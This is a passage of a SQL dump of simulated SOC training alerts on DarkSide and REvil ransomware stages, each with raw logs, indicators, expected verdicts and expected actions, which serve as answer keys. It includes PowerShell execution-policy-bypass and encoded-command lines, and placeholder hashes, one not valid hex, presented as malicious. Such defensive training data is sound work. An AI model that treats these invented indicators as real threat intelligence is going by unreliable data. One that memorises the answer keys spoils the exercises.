(420, 'Persistence Mechanism Detected', 'high', 'System Logs', 'A persistence mechanism associated with DarkSide has been detected, indicating an attempt to maintain access to the compromised system. The mechanism involves suspicious registry modifications and the presence of known malicious binaries.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"host_ip\":\"192.168.1.105\",\"user\":\"john_doe\",\"event_id\":7045,\"event_source\":\"Service Control Manager\",\"service_name\":\"DarkSideService\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\",\"md5_hash\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"attacker_ip\":\"203.0.113.45\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"DarkSideService\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\"}}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with DarkSide malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"darkside.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to DarkSide operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"clean\",\"details\":\"User associated with the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(421, 'Unauthorized Admin Access', 'high', 'Network Traffic Analysis', 'The attackers use escalated privileges to move laterally within the network, targeting systems that control pipeline operations. Network logs indicate unauthorized login attempts to admin accounts from suspicious external IPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T07:45:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"username\":\"admin_user\",\"success\":true,\"action\":\"login\",\"description\":\"Successful login using administrative credentials from external IP.\",\"alert\":\"Unauthorized Admin Access Detected\",\"hashes\":{\"sha256\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\"}}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in connection with APT attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(422, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, DarkSide attempts to exfiltrate sensitive operational data, which could be used for ransom or sold on the black market. The DLP system detected an unauthorized data transfer to an external IP address.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_hash\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"filename\":\"OperationalData_Backup.zip\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLPS-5678-EXF\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious data exfiltration files.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OperationalData_Backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data being exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account potentially compromised for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(423, 'Unusual Phishing Email Detected', 'medium', 'Email Gateway Logs', 'An employee received a phishing email with a malicious attachment, indicative of REvil\'s initial access strategy. The email originated from a suspicious IP and contained a known malicious file hash.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"invoice_update.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"user\":\"j.doe\",\"message_id\":\"<20231017083245.123456@maliciousdomain.com>\"}', '2026-01-04 04:25:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain flagged for sending phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious document used by REvil.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_update.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern common in phishing attachments.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Internal employee targeted by phishing attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Unusual Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.029Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(424, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'A PowerShell script was executed on the endpoint, potentially indicating malicious activity consistent with REvil ransomware tactics. The script was observed executing commands to download additional payloads from a known malicious IP.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:27Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-3FQ7K9R\",\"user\":\"johndoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"filename\":\"malicious_script.ps1\"}', '2026-01-04 04:25:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with REvil ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution in user temp directory\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account on the network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(425, 'Persistence Mechanism Established', 'high', 'Registry Changes Monitoring', 'The REvil ransomware has established persistence by modifying registry keys, ensuring they retain access after a system reboot. This action is indicative of a sophisticated attack aimed at maintaining long-term access to the compromised system.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:15:45Z\",\"event_id\":\"4624\",\"event_type\":\"Registry Change Detected\",\"host\":\"compromised-host.local\",\"user\":\"administrator\",\"ip_address\":\"192.168.1.10\",\"external_ip\":\"185.92.220.65\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"registry_value\":\"C:\\\\ProgramData\\\\REvil\\\\malicious.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"description\":\"Registry key modified to establish persistence by REvil malware.\"}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server related to REvil activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with REvil ransomware executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Registry Change 